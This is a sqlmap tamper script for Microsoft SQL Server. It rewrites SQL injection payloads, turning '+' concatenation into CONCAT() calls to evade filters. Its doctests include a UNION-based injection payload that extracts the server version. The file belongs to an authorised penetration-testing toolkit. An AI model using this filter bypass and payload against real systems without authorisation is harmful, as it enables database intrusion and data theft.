1
#!/usr/bin/env python
2

3
"""
4
Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5
See the file 'LICENSE' for copying permission
6
"""
7

8
import os
9
import re
10

11
from lib.core.common import singleTimeWarnMessage
12
from lib.core.common import zeroDepthSearch
13
from lib.core.enums import DBMS
14
from lib.core.enums import PRIORITY
15

16
__priority__ = PRIORITY.HIGHEST
17

18
def dependencies():
19
    singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MSSQL))
20

21
def tamper(payload, **kwargs):
22
    """
23
    Replaces plus operator ('+') with (MsSQL) function CONCAT() counterpart
24

25
    Tested against:
26
        * Microsoft SQL Server 2012
27

28
    Requirements:
29
        * Microsoft SQL Server 2012+
30

31
    Notes:
32
        * Useful in case ('+') character is filtered
33

34
    >>> tamper('SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL')
35
    'SELECT CONCAT(CHAR(113),CHAR(114),CHAR(115)) FROM DUAL'
36

37
    >>> tamper('1 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(118)+CHAR(112)+CHAR(112)+CHAR(113)+ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32))+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(112)+CHAR(113)-- qtfe')
38
    '1 UNION ALL SELECT NULL,NULL,CONCAT(CHAR(113),CHAR(118),CHAR(112),CHAR(112),CHAR(113),ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32)),CHAR(113),CHAR(112),CHAR(107),CHAR(112),CHAR(113))-- qtfe'
39
    """
40

41
    retVal = payload
42

43
    if payload:
44
        match = re.search(r"('[^']+'|CHAR\(\d+\))\+.*(?<=\+)('[^']+'|CHAR\(\d+\))", retVal)
45
        if match:
46
            part = match.group(0)
47

48
            chars = [char for char in part]
49
            for index in zeroDepthSearch(part, '+'):
50
                chars[index] = ','
51

52
            replacement = "CONCAT(%s)" % "".join(chars)
53
            retVal = retVal.replace(part, replacement)
54

55
    return retVal
56

57